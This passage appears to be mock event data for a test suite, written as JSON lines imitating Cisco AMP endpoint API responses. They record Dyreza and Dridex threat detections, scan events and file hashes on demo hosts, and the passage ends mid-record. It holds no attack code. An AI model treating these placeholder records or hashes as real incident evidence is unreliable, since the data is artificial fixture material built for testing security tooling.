+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":249000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":890000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688040","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":3652,"disposition":"Malicious","file_name":"webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688039","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":625000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688038","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256382891721000,"timestamp":1610705229,"timestamp_nanoseconds":658000000,"date":"2021-01-15T10:07:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256382891720741","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209575793000000,"timestamp":1610705225,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209575793000469","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364862671421000,"timestamp":1610705225,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker","clean":true,"scanned_files":9,"scanned_processes":0,"scanned_paths":2,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364858376454000,"timestamp":1610705224,"timestamp_nanoseconds":772000000,"date":"2021-01-15T10:07:04+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256331352113000,"timestamp":1610705217,"timestamp_nanoseconds":646000000,"date":"2021-01-15T10:06:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256331352113188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209511368491000,"timestamp":1610705210,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:06:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209511368491028","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364793951945000,"timestamp":1610705209,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:06:49+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft Games","clean":true,"scanned_files":30,"scanned_processes":0,"scanned_paths":14,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364789656977000,"timestamp":1610705208,"timestamp_nanoseconds":193000000,"date":"2021-01-15T10:06:48+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft Games"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256279812506000,"timestamp":1610705205,"timestamp_nanoseconds":634000000,"date":"2021-01-15T10:06:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256279812505635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209481303720000,"timestamp":1610705203,"timestamp_nanoseconds":152000000,"date":"2021-01-15T10:06:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209481303719955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209477008753000,"timestamp":1610705202,"timestamp_nanoseconds":138000000,"date":"2021-01-15T10:06:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209477008752658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256228272898000,"timestamp":1610705193,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:06:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256228272898082","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209416879210000,"timestamp":1610705188,"timestamp_nanoseconds":769000000,"date":"2021-01-15T10:06:28+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209416879210513","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209412584243000,"timestamp":1610705187,"timestamp_nanoseconds":755000000,"date":"2021-01-15T10:06:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209412584243216","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256181028258000,"timestamp":1610705182,"timestamp_nanoseconds":0,"date":"2021-01-15T10:06:22+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256181028257825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256125193683000,"timestamp":1610705169,"timestamp_nanoseconds":972000000,"date":"2021-01-15T10:06:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256125193682976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256073654075000,"timestamp":1610705157,"timestamp_nanoseconds":960000000,"date":"2021-01-15T10:05:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256073654075423","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533665784395203000,"timestamp":1610705155,"timestamp_nanoseconds":851000000,"date":"2021-01-15T10:05:55+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899829000000,"timestamp":1610705149,"timestamp_nanoseconds":829000000,"date":"2021-01-15T10:05:49+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610705149,"start_date":"2021-01-15T10:05:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"FlashPlayerApp.exe","identity":{"sha256":"c1219f0799e60ff48a9705b63c14168684aed911610fec68548ea08f605cc42b"}},"vulnerabilities":[{"name":"Adobe Flash 